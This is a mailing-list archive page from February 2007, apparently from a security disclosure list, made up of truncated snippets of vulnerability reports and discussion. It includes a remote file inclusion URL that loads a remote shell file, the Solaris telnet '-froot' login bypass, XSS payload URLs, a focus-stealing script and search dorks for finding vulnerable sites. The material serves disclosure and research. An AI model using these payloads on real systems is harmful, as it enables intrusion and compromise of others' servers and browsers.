Alle 21:54, sabato 10 febbraio 2007, Andrea Purificato - bunker ha scritto:
Version affected: qdig-1.2.9.3, qdig-devel-20060624
Bug fixed by 1.2.9.4 and devel-20070210
Thanks to haganafox for his work,
--
Andrea bunker Purificato
+++[+++
* phpPolls 1.0.3 (acces to sensitive file)
* By : sn0oPy
* Risk : medium
* exploit :
Replace http://www.target.ma/phpPolls/index.php3
by
http://www.target.ma/phpPolls/phpPollAdmin.php3
* dork : inurl:phpPolls/
* contact : [EMAIL PROTECTED]
* Site :
On Sun, 11 Feb 2007, pdp (architect) wrote:
IE is vulnerable too, since I used to play around with this bug long
time ago.
Possibly MS00-093, but that's long fixed. But yes, MSIE variant is
possible, though more contrived.
/mz
try this
input id=foo type=text/
script
setInterval(function () {
document.getElementById('foo').focus();
},1);
/script
:) the address bar is disabled...
On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote:
phh :), I found something very interesting when testing your IE
example... every time
Multiple vulnerabilities in phpMyVisites
Application : phpMyVisites prior to 2.2 stable
Release Date : 11 February 2007
Author : Nicob nicob at nicob.net
Abstract :
==
Several vulnerabilities were identified in phpMyVisites. This software
is a free and powerful open source
here is an idea... we can combine both techniques into a single
attack... the hardest part of your hack is to force the user to type
:// plus several other / but if we steel the focus from the address
bar, unaware users will type something like this http://www.google.com
for example, which is
On Sun, 11 Feb 2007, pdp (architect) wrote:
here is an idea... we can combine both techniques into a single
attack... the hardest part of your hack is to force the user to type
:// plus several other /
Actually, MSIE doesn't require drive specification in the filename, and
will probably
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
php rrd browser (prb)
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in
php rrd browser 0.2.1
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
IP3 NetAccess leads to full system compromise
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
leads to full
This is not an SQL Injection. The script don't use any SQL database, please
tell me where is the sql request =). However the install.php script can lead to
php code execution (works regardless of php.ini settings). Proof of concept:
-
#!/usr/bin/php
?php
# This file require the PhpSploit
Vendor: MediaWiki
Vulnerable: MediaWiki 1.9.1 and below
Bugtraq ID:
Secunia Advisory:
Release Date: 2007-01-29
Full Path Disclosure
This vulnerability affects all the default skins:
http://www.example.com/wiki/skins/Simple.deps.php
http://www.example.com/wiki/skins/MonoBook.deps.php
Well, :) I cannot see how you can force someone to type / at least
twice. Even if the targeted user writes a blog entry it is very
unlikely that he/she will use / . I guess this vector works well on
wikies and other systems that allow you to specify the text format
through meta-characters.
The
On Sun, 11 Feb 2007, Michal Zalewski wrote:
http://lcamtuf.coredump.cx/focusbug/index.html (FF)
http://lcamtuf.coredump.cx/focusbug/ieversion.html (MSIE)
Paul Szabo pointed out that this is related to exploits posted by Charles
McAuley and Bart van Arnhem in June 2006 (CVE-2006-2894). These
Thanks for the report, Michal.
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
BTW: Your last bug (popup blocker + XMLHttpRequest + srand() = oops) was
filed as bug 369390 https://bugzilla.mozilla.org/show_bug.cgi?id=369390
The factors of the bug are filed as separate
On Sun, 11 Feb 2007, Ben Bucksch wrote:
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
As per my later posts, this problem might be already in Bugzilla (a
variant of it was reported in mid-2006, and possibly independently as
early as in 2000).
BTW: Your last bug
Are file inclusion vulnerabilitiess equivalent to remote code
execution? Are servers (both Linux and Windows) now the lower hanging
fruit rather than desktop systems?
In the February edition of the Virus Bulletin magazine, we (Kfir
Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security)
I have contacted the developers 2 weeks ago, still no answer...
Vendor: DotClear
Vulnerable: DotClear 1.2.5 and below
Release Date: 2007-01-28
Full Path Disclosure
This vulnerability affects:
http://www.example.com/dotclear/themes/default/form.php
On Mon, Feb 12, 2007 at 12:00:30AM -0600, Gadi Evron wrote:
Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:
Tested around, and it does indeed work, on all solaris 10 (sparc x86).
Update from HD Moore:
but this bug isnt -froot, its -fanythingbutroot
pdp (architect) wrote:
try this
input id=foo type=text/
script
setInterval(function () {
document.getElementById('foo').focus();
},1);
/script
:) the address bar is disabled...
Funny. Filed as bug 370094
https://bugzilla.mozilla.org/show_bug.cgi?id=370094
Ben Bucksch [EMAIL PROTECTED] wrote:
Filed as bug 370092 https://bugzilla.mozilla.org/show_bug.cgi?id=370092
Please see also:
https://bugzilla.mozilla.org/show_bug.cgi?id=290478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2894
https://bugzilla.mozilla.org/show_bug.cgi?id=56236
After some research, I can offer this clarification:
1) The MSIE 7 attack vector I described is a distinctive, new
vulnerability that differs from the attack reported by Charles
McAuley and Bart van Arnhem. Attacks described by them were
fixed in MSIE7 (although MSIE6 is still
Site : Raditech.es
Product : Portal Search (May be others)
Portal Search is a product that can help to search in one or multiple Web
sites. http://www.raditech.es/esp/servicios/portal-search.shtml
This product can SEARCH and INDEX the contents of a entire web
site,additionally this product
===
Ubuntu Security Notice USN-417-3 February 09, 2007
postgresql-8.1 regression
===
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
This
Version : 1.0 Beta
Download : http://www.killervault.com
Files : guestbook.php
Error : function dologin() {
global $mysql, $gbpass, $gburl;
$time = time() + 86400*365;
if($gbpass == $mysql['pass']) {
setcookie('kvgbcookie', $mysql['pass'], $time, '/');
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Publisher Name: OpenPKG GmbH
Publisher Home: http://openpkg.com/
Advisory Id (public):OpenPKG-SA-2007.009
Advisory Type: OpenPKG Security
what's up Michal,
IE is vulnerable too, since I used to play around with this bug long
time ago. It is a variation of your exploit but the principles are the
same. I don't remember where I've read about it... hmm I guess
securityfocus.com... very nice demo.
On 2/11/07, Michal Zalewski [EMAIL
I have posted previously about a bug that seems to cause applications to
continue to run when a user logs off and when another users logs on,
he/she may be able to access the programs that continued to run after
the logoff, for example:
1. Log on as Administrator
2. Do some stuff
3. Log off,
funny, that bug seems to have been around for some time ^^
http://osvdb.org/displayvuln.php?osvdb_id=1007
--
best rgds, armin walland
focus market research
IT :: development, administration
http://www.focusmr.com
maculangasse 8
1220 wien
+43 (0)1-258 97 01 291
please try not to send me HTML
Folks,
During the last few years a couple of vulnerability advisories were
published about a number of blind attacks against TCP (.
These attacks required the attacker to guess or know the four-tuple
that identifies the TCP connection to be attacked.
Clearly, of the IP addresses and port
++
Virtual Calendar = (pwd.txt) Remote Password Disclosur Vulnerability
Script: Virtual Calendar
DorK: intitle:Virtual intitle:Calendar intitle:Demo
URL:
hey ..
Vulnerable : JBoss Portal
web : http://jboss.org
XSS :
1-
http://labs.example.org/portal/community?noproject=;scriptalert('BLacK_ZeRo')/script
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial
Solaris telnet 0-day.
telnet -l -froot [hostname]
hey guys .. check out this new xss i just found ;P
Vulnerable : communityserver Commercial edition
web : http://communityserver.org/
XSS :
http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3eo=Relevance
Discovered By BLacK ZeRo
[EMAIL
hey guys .. check out this new xss i just found ;P
Vulnerable : lighttpd
web : http://www.lighttpd.net
XSS :
http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
hey guys .. check out this new xss i just found ;P
Vulnerable : eWay
web : http://www.eway.no/eway
XSS :
http://127.0.0.1/path/default.aspx?pid=;scriptalert('bl4ck')/script
Discovered By BLacK ZeRo
[EMAIL PROTECTED]
Best regards ,,
Someone found a crash bug in PHP 5.2.1.
Exploitable?
http://marc.theaimsgroup.com/?l=php-devm=117104930526516w=2
#[ Coded : H0tTurk-]
#[ Author: DrmaxVirus
#[ web app : Oreon1.2.3 Remote File #304;nclude ]
#[ My Site : WwW.H0tTurk.CoM ]
#[Referance:http://www.milw0rm.com/exploits/3150
#[ Thanx :
On Mon, 12 Feb 2007, Paul Szabo wrote:
https://bugzilla.mozilla.org/show_bug.cgi?id=304480
https://bugzilla.mozilla.org/show_bug.cgi?id=56236
https://bugzilla.mozilla.org/show_bug.cgi?id=258875
This probably explains why the core of the problem wasn't fixed for
Firefox: reports were
Version :
0.02 beta
Error :
require ($inews_path/inertia_sql_class.php);
Exploit :
http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/shell.txt
Eno7.Org - Crazy-King.ORg
Thanks : Apaci Erne Eno7 Tamturk UyussMan Ayy#305;ld#305;z Tim
On Mon, 12 Feb 2007, [ISO-8859-1] Claus Färber wrote:
A proper solution would be to keep a list of files explicitly selected
by the user and only allow uploads of files in this list. Then even if a
script can manipulate the field, the browser won't upload files that
have not been selected by
Dear List,
GE telnet -l -froot [hostname]
GE but this bug isnt -froot, its -fanythingbutroot =P
Should we really consider this a BUG ? With all due respect, this
reads, smells and probably tastes like a backdoor, and obvious one
granted but still, to my believe this raises the question are
On Sun, 11 Feb 2007, Michal Zalewski wrote:
This was tested with 2.0.0.1. Opera is most likely not vulnerable;
Microsoft Internet Explorer is not vulnerable as-is, but might be
vulnerable to a variant of the attack.
And indeed - here's a MSIE 7.0 demo:
Any word if Ipswitch released any fix for this? Is the latest version
vulnerable?
Title:Microsoft Visual C++ 8.0 standard library time functions
invalid assertion DoS (Problem 3000).
Product: Visual Studio 2005
Vendor: Microsoft
Vulnerability
class:Denial of Service
Remote: application dependant, remote vector is possible
CVE:
Michal Zalewski schrieb:
This probably explains why the core of the problem wasn't fixed for
Firefox: reports were repeatedly reduced to an issue with hiding file
input fields by manipulating opacity or visibility (in my example, I
placed the box off-screen to the left, at negative absolute
There is an interesting logic flaw in Mozilla Firefox web browser.
The vulnerability allows the attacker to silently redirect focus of
selected key press events to an otherwise protected file upload form
field. This is possible because of how onKeyDown / onKeyPress events are
handled, allowing
46 matches
Mail list logo